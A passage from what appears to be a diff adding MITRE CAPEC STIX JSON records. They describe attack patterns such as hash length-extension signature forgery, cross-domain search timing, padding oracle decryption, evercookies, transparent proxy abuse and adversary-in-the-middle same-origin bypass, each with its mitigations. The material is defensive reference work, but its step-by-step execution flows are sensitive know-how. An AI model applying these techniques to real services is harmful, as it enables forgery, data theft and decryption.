"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--315c1643-cc8e-472e-8bbc-264b098bf84b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8846dae1-8419-4e74-8ec5-58bff613dbec", + "spec_version": "2.1", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a hash function extension/padding weakness, to modify the parameters passed to the web service requesting authentication by generating their own call in order to generate a legitimate signature hash (as described in the notes), without knowledge of the secret token sometimes provided by the web service.", + "external_references": [ + { + "external_id": "CAPEC-461", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/461.html" + }, + { + "external_id": "CWE-328", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/328.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Thai Duong, Juliano Rizzo, Flickr's API Signature Forgery Vulnerability, 2009--09---28", + "external_id": "REF-398", + "source_name": "reference_from_CAPEC", + "url": "http://netifera.com/research/flickr_api_signature_forgery.pdf" + } + ], + "id": "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Services API Signature Forgery Leveraging Hash Function Extension Weakness", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "To leverage an attack against the has function extension / padding weakness, consider the message to be passed to the web service is M (this message includes the parameters passed to the web service concatenated with the secret token / key bytes). The message M is hashed and that hash is passed to the web service and is used for authentication. The attacker does not know M, but can see Hash (M) and Length (M). The attacker can then compute Hash (M || Padding (M) || M') for any M'. The attacker does not know the entire message M, specifically the attacker does not know the secret bytes, but that does not matter. The attacker is still able to sign their own message M' and make the called web service verify the integrity of the message without an error." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a vulnerable web service: The adversary finds a web service that uses a vulnerable authentication scheme, where an authentication token is concatenated with the parameters of a request and then hashed

    2. Techniques
    Read application documentation to learn about authentication schemes being used
    Observe web service traffic to look for vulnerable authentication schemes

Experiment

  1. Attempt adding padding to parameters: An adversary tests if they can simply add padding to the parameters of a request such that the request is technically changed, with the hash remaining the same

    2. Techniques
    Exploit the hash function extension / padding weakness with only padding to test the weakness

Exploit

  1. Add malicious parameters to request: Add malicious parameters to a captured request in addition to what is already present. Do this by exploiting the padding weakness of the hash function and send the request to the web service so that it believes it is authenticated and acts on the extra parameters.

    2. Techniques
    Exploit the hash function extension / padding weakness by adding malicious parameters to a web service request such that it is still deemed authentic
", + "x_capec_extended_description": "\n When web services require callees to authenticate, they sometimes issue a token / secret to the caller that the caller is to use to sign their web service calls. In one such scheme the caller, when constructing a request, would concatenate all of the parameters passed to the web service with the provided authentication token and then generate a hash of the concatenated string (e.g., MD5, SHA1, etc.). That hash then forms the signature that is passed to the web service which is used on the server side to verify the origin authenticity and integrity of the message. Because of the iterative design of the hash function, it is possible, from only the hash of a message and its length, for an adversary to conduct signature forgery by computing the hash of longer messages that start with the initial message and include the padding required for the initial message to reach a multiple of 512 bits. It is important to note that the attack not limited to MD5 and will work on other hash functions such as SHA1.\n ", + "x_capec_prerequisites": [ + "Web services check the signature of the API calls", + "Authentication tokens / secrets are shared between the server and the legitimate client", + "The API call signature is generated by concatenating the parameter list with the shared secret and hashing the result.", + "An iterative hash function like MD5 and SHA1 is used.", + "An attacker is able to intercept or in some other way gain access to the information passed between the legitimate client and the server in order to retrieve the hash value and length of the original message.", + "The communication channel between the client and the server is not secured via channel security such as TLS" + ], + "x_capec_resources_required": [ + "\n Access to a function to produce a hash (e.g., MD5, SHA1)\n Tools that allow the attacker to intercept a message between the client and the server, specifically the hash that is the signature and the length of the original message concatenated with the secret bytes\n " + ], + "x_capec_skills_required": { + "Medium": "Medium level of cryptography knowledge, specifically how iterative hash functions work. This is needed to select proper padding." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a secure message authentication code (MAC) function such as an HMAC-SHA1", + "id": "course-of-action--4f8988fb-2aec-4c9c-bd03-a3c8ca7fed94", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-461-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73e90459-19d2-486f-ab40-7a72b5bc43fa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f8988fb-2aec-4c9c-bd03-a3c8ca7fed94", + "spec_version": "2.1", + "target_ref": "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. Browser's same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain.", + "external_references": [ + { + "external_id": "CAPEC-462", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/462.html" + }, + { + "external_id": "CWE-385", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/385.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "Chris Evans, Cross-Domain Search Timing, 2009--12---11", + "external_id": "REF-399", + "source_name": "reference_from_CAPEC", + "url": "http://scarybeastsecurity.blogspot.com/2009/12/cross-domain-search-timing.html" + } + ], + "id": "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross-Domain Search Timing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine service to send cross domain requests to: The adversary first determines which service they will be sending the requests to

Experiment

  1. Send and time various cross domain requests: Adversaries will send a variety of cross domain requests to the target, timing the time it takes for the target to respond. Although they won't be able to read the response, the adversary can use the time to infer information about what the service did upon receiving the request.

    2. Techniques
    Using a GET request, leverage the \"img\" tag in conjunction with \"onload() / onerror()\" javascript events to time a response
    Using a POST request, leverage the \"iframe\" element and use the \"onload()\" event to time a response

Exploit

  1. Infer information from the response time: After obtaining reponse times to various requests, the adversary will compare these times and infer potentially sensitive information. An example of this could be asking a service to retrieve information and random usernames. If one request took longer to process, it is likely that a user with that username exists, which could be useful knowledge to an adversary.

    2. Techniques
    Compare timing of different requests to infer potentially sensitive information about a target service
", + "x_capec_extended_description": "\n For GET requests an attacker could for instance leverage the \"img\" tag in conjunction with \"onload() / onerror()\" javascript events. For the POST requests, an attacker could leverage the \"iframe\" element and leverage the \"onload()\" event. There is nothing in the current browser security model that prevents an attacker to use these methods to time responses to the attackers' cross domain requests. The timing for these responses leaks information. For instance, if a victim has an active session with their online e-mail account, an attacker could issue search requests in the victim's mailbox. While the attacker is not able to view the responses, based on the timings of the responses, the attacker could ask yes / no questions as to the content of victim's e-mails, who the victim e-mailed, when, etc. This is but one example; There are other scenarios where an attacker could infer potentially sensitive information from cross domain requests by timing the responses while asking the right questions that leak information.\n ", + "x_capec_prerequisites": [ + "Ability to issue GET / POST requests cross domainJava Script is enabled in the victim's browserThe victim has an active session with the site from which the attacker would like to receive informationThe victim's site does not protect search functionality with cross site request forgery (CSRF) protection" + ], + "x_capec_resources_required": [ + "Ability to issue GET / POST requests cross domain" + ], + "x_capec_skills_required": { + "Low": "Some knowledge of Java Script" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: The victim's site could protect all potentially sensitive functionality (e.g. search functions) with cross site request forgery (CSRF) protection and not perform any work on behalf of forged requests", + "id": "course-of-action--f46f8204-a5a5-4d0b-927d-1204f8d80a35", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-462-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8f742a2-4f13-496c-ae38-b401f66aa531", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f46f8204-a5a5-4d0b-927d-1204f8d80a35", + "spec_version": "2.1", + "target_ref": "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: The browser's security model could be fixed to not leak timing information for cross domain requests", + "id": "course-of-action--91807008-54b1-456b-8522-5ba6ea9ca3b5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-462-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6c073f92-1bbc-43d5-92cf-3df1be18d378", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--91807008-54b1-456b-8522-5ba6ea9ca3b5", + "spec_version": "2.1", + "target_ref": "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.", + "external_references": [ + { + "external_id": "CAPEC-463", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/463.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-514", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/514.html" + }, + { + "external_id": "CWE-649", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/649.html" + }, + { + "external_id": "CWE-347", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/347.html" + }, + { + "external_id": "CWE-354", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html" + }, + { + "external_id": "CWE-696", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/696.html" + }, + { + "description": "Juliano Rizzo, Thai Duong, Practical Padding Oracle Attacks, 2010--05---25", + "external_id": "REF-400", + "source_name": "reference_from_CAPEC", + "url": "https://www.usenix.org/legacy/events/woot10/tech/full_papers/Rizzo.pdf" + } + ], + "id": "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Padding Oracle Crypto Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f" + ], + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "An adversary sends a request containing ciphertext to the target system. Due to the browser's same origin policy, the adversary is not able to see the response directly, but can use cross-domain information leak techniques to still get the information needed (i.e., information on whether or not a padding error has occurred). This can be done using \"img\" tag plus the onerror()/onload() events. The adversary's JavaScript can make web browsers to load an image on the target site, and know if the image is loaded or not. This is 1-bit information needed for the padding oracle attack to work: if the image is loaded, then it is valid padding, otherwise it is not." + ], + "x_capec_extended_description": "\n Any cryptosystem can be vulnerable to padding oracle attacks if the encrypted messages are not authenticated to ensure their validity prior to decryption, and then the information about padding error is leaked to the adversary. This attack technique may be used, for instance, to break CAPTCHA systems or decrypt/modify state information stored in client side objects (e.g., hidden fields or cookies). This attack technique is a side-channel attack on the cryptosystem that uses a data leak from an improperly implemented decryption routine to completely subvert the cryptosystem. The one bit of information that tells the adversary whether a padding error during decryption has occurred, in whatever form it comes, is sufficient for the adversary to break the cryptosystem. That bit of information can come in a form of an explicit error message about a padding error, a returned blank page, or even the server taking longer to respond (a timing attack). This attack can be launched cross domain where an adversary is able to use cross-domain information leaks to get the bits of information from the padding oracle from a target system / service with which the victim is communicating.\n ", + "x_capec_prerequisites": [ + "The decryption routine does not properly authenticate the message / does not verify its integrity prior to performing the decryption operation", + "The target system leaks data (in some way) on whether a padding error has occurred when attempting to decrypt the ciphertext.", + "The padding oracle remains available for enough time / for as many requests as needed for the adversary to decrypt the ciphertext." + ], + "x_capec_resources_required": [ + "\n Ability to detect instances where a target system is vulnerable to an oracle padding attack\n Sufficient cryptography knowledge and tools needed to take advantage of the presence of the padding oracle to perform decryption / encryption of data without a key\n " + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a message authentication code (MAC) or another mechanism to perform verification of message authenticity / integrity prior to decryption", + "id": "course-of-action--e62691da-d711-47e8-8c82-b97dcb9b3a05", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-463-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a67f1d51-adca-411e-89d1-92f674949ad3", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e62691da-d711-47e8-8c82-b97dcb9b3a05", + "spec_version": "2.1", + "target_ref": "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Do not leak information back to the user as to any cryptography (e.g., padding) encountered during decryption.", + "id": "course-of-action--330dc21b-bad8-4391-98c9-c29f84c83208", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-463-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c01803b-7af5-4c55-98ce-633b944b0847", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--330dc21b-bad8-4391-98c9-c29f84c83208", + "spec_version": "2.1", + "target_ref": "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker creates a very persistent cookie that stays present even after the user thinks it has been removed. The cookie is stored on the victim's machine in over ten places. When the victim clears the cookie cache via traditional means inside the browser, that operation removes the cookie from certain places but not others. The malicious code then replicates the cookie from all of the places where it was not deleted to all of the possible storage locations once again. So the victim again has the cookie in all of the original storage locations. In other words, failure to delete the cookie in even one location will result in the cookie's resurrection everywhere. The evercookie will also persist across different browsers because certain stores (e.g., Local Shared Objects) are shared between different browsers.", + "external_references": [ + { + "external_id": "CAPEC-464", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/464.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + }, + { + "description": "Forge Web Credentials: Web Cookies", + "external_id": "T1606.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1606/001" + }, + { + "description": "Samy Kamkar, Evercookie, 2010--09---09", + "external_id": "REF-401", + "source_name": "reference_from_CAPEC", + "url": "http://samy.pl/evercookie/" + } + ], + "id": "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Evercookie", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The places a persistent cookie is stored on a victim's machine include: Standard HTTP Cookies, Local Shared Objects (Flash Cookies), Silverlight Isolated Storage, Storing cookies in RGB values of auto-generated, force-cached, PNGs using HTML5 Canvas tag to read pixels (cookies) back out, Storing cookies in Web History, Storing cookies in HTTP ETags, Storing cookies in Web cache, window.name caching, Internet Explorer userData storage, HTML5 Session Storage, HTML5 Local Storage, HTML5 Global Storage, HTML5 Database Storage via SQLite, among others.\n ", + "x_capec_prerequisites": [ + "The victim's browser is not configured to reject all cookiesThe victim visits a website that serves the attackers' evercookie" + ], + "x_capec_resources_required": [ + "Evercookie source code" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Browser's design needs to be changed to limit where cookies can be stored on the client side and provide an option to clear these cookies in all places, as well as another option to stop these cookies from being written in the first place.", + "id": "course-of-action--613f9459-29ce-43e4-91dd-68f4e6148ef6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-464-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e1626045-707b-4f32-995a-db4309834849", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--613f9459-29ce-43e4-91dd-68f4e6148ef6", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Safari browser's private browsing mode is currently effective against evercookies.", + "id": "course-of-action--252ad1a2-1f99-45a1-a6b1-8ed47af8a5c5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-464-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8204979e-c9d8-4eee-a37d-f28d5d01c12e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--252ad1a2-1f99-45a1-a6b1-8ed47af8a5c5", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A transparent proxy serves as an intermediate between the client and the internet at large. It intercepts all requests originating from the client and forwards them to the correct location. The proxy also intercepts all responses to the client and forwards these to the client. All of this is done in a manner transparent to the client.", + "external_references": [ + { + "external_id": "CAPEC-465", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/465.html" + }, + { + "external_id": "CWE-441", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/441.html" + }, + { + "description": "Proxy: Internal Proxy", + "external_id": "T1090.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1090/001" + }, + { + "description": "Robert Auger, Socket Capable Browser Plugins Result In Transparent Proxy Abuse, 2009", + "external_id": "REF-402", + "source_name": "reference_from_CAPEC", + "url": "http://www.thesecuritypractice.com/the_security_practice/TransparentProxyAbuse.pdf" + } + ], + "id": "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Transparent Proxy Abuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n Transparent proxies are often used by enterprises and ISPs. For requests originating at the client transparent proxies need to figure out the final destination of the client's data packet. Two ways are available to do that: either by looking at the layer three (network) IP address or by examining layer seven (application) HTTP header destination. A browser has same origin policy that typically prevents scripts coming from one domain initiating requests to other websites from which they did not come. To circumvent that, however, malicious Flash or an Applet that is executing in the user's browser can attempt to create a cross-domain socket connection from the client to the remote domain. The transparent proxy will examine the HTTP header of the request and direct it to the remote site thereby partially bypassing the browser's same origin policy. This can happen if the transparent proxy uses the HTTP host header information for addressing rather than the IP address information at the network layer. This attack allows malicious scripts inside the victim's browser to issue cross-domain requests to any hosts accessible to the transparent proxy.\n ", + "x_capec_prerequisites": [ + "Transparent proxy is usedVulnerable configuration of network topology involving the transparent proxy (e.g., no NAT happening between the client and the proxy)Execution of malicious Flash or Applet in the victim's browser" + ], + "x_capec_skills_required": { + "Medium": "Creating malicious Flash or Applet to open a cross-domain socket connection to a remote system" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that the transparent proxy uses an actual network layer IP address for routing requests. On the transparent proxy, disable the use of routing based on address information in the HTTP host header.", + "id": "course-of-action--d939e9ad-f3d3-4c25-8ec4-fd98a3ffed73", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-465-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9ac63888-5744-4d6d-adf1-0adf39beb786", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d939e9ad-f3d3-4c25-8ec4-fd98a3ffed73", + "spec_version": "2.1", + "target_ref": "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable in the browser the execution of Java Script, Flash, SilverLight, etc.", + "id": "course-of-action--e6df32f5-31e9-467d-bbd7-4146d1870ef4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-465-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--60c4dab5-4f4b-44f2-9098-04dc6db7b9a4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e6df32f5-31e9-467d-bbd7-4146d1870ef4", + "spec_version": "2.1", + "target_ref": "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages an adversary in the middle attack (CAPEC-94) in order to bypass the same origin policy protection in the victim's browser. This active adversary in the middle attack could be launched, for instance, when the victim is connected to a public WIFI hot spot. An attacker is able to intercept requests and responses between the victim's browser and some non-sensitive website that does not use TLS.", + "external_references": [ + { + "external_id": "CAPEC-466", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/466.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "description": "Roi Saltzman, Adi Sharabani, Active Man in the Middle Attacks, 2009--02---02, IBM Rational Application Security Group", + "external_id": "REF-403", + "source_name": "reference_from_CAPEC", + "url": "http://blog.watchfire.com/wfblog/2009/02/active-man-in-the-middle-attacks.html" + } + ], + "id": "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Leveraging Active Adversary in the Middle Attacks to Bypass Same Origin Policy", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n When an attacker intercepts a response bound to the victim, an attacker adds an iFrame (which is possibly invisible) to the response referencing some domain with sensitive functionality and forwards the response to the victim. The victim's browser than automatically initiates an unauthorized request to the site with sensitive functionality. The same origin policy would prevent making these requests to a site other than the one from which the Java Script came, but the attacker once again uses active adversary in the middle to intercept these automatic requests and redirect them to the domain / service with sensitive functionality. Any persistent cookies that the victim has in their browser would be used for these unauthorized requests. The attacker thus actively directs the victim to a site with sensitive functionality. When the site with sensitive functionality responds back to the victim's request, an active adversary in the middle attacker 